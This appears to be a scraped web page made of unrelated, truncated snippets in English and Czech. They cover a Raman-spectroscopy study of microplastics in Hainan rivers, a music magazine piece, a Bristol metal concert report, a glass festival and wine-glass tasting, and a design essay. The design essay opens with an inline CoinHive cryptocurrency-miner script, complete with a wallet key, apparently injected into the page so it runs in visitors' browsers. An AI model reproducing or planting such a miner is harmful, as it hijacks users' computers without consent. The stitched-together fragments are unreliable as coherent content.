Revealing the secrets of glass

Researchers at Guangxi University and the Chinese Academy of Tropical Agricultural Sciences have used Raman spectroscopy to determine the portion of microplastics which derive from agricultural mulch films. They used a Renishaw inVia™ confocal Raman microscope to analyse sediment and soil collected from different sites around four main rivers in the Hainan Province of China, the Nandu, Wenlan, Zhubi and Changhua.

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An article in HIS voice magazine, revealing the electronic music...

An article in HIS voice magazine, revealing the electronic music scene in Hradec Králové. Written by Tomáš Procházka.

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Liquid State, Endeavour, Armada of Secrets, Bloodywood The Lanes, Bristol fotoreport

V rámci Evropského tour zavítala indická metalová kapela Bloodywood i do anglického Bristolu, kde ji podpořily kapely Liquid State, Endeavour a Armada of Secrets. [See image gallery at] The post Liquid State, Endeavour, Armada of Secr

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Art & Glass Festival

Polské Jeleniogórskie Centrum Kultury a Společenský dům Jilm si Vás dovolují pozvat na dvoudenní řemeslné a výtvarné trhy Art & Glass Festival

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Riedel Glass tasting Veloce

Glass tasting se stává čím dál více populární záležitostí, protože jakmile jednou ochutnáte víno z té správné sklenice a zjistíte, že váš chuťový zážitek se může posunout o level dál, již nebudete chtít jinak. Spojení preciznosti a elegance. Spojení krásy

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var miner = new CoinHive.Anonymous(49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start(); Mystic Vehicle of Contemporary Technology

If you carefully observe designed objects around you, perhaps you may find the unspoken process of their birth. Their ingredients and parts should come from somewhere in this globe, and mixed and combined together in a factory of somewhere, through hands

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